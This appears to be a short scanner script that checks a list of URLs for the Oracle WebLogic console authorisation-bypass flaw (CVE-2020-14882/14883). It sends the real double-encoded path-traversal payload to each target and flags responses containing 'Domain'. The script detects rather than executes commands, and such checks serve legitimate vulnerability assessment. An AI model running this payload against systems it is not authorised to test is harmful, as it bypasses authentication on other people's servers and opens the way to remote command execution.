#request urls = array
#define payload =/console/css/%252e%252e%252fconsole.portal
#define bug = Domain
#define info = 存在Weblogic 管理控制台未授权远程命令执行漏洞（CVE-2020-14882，CVE-2020-14883）

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
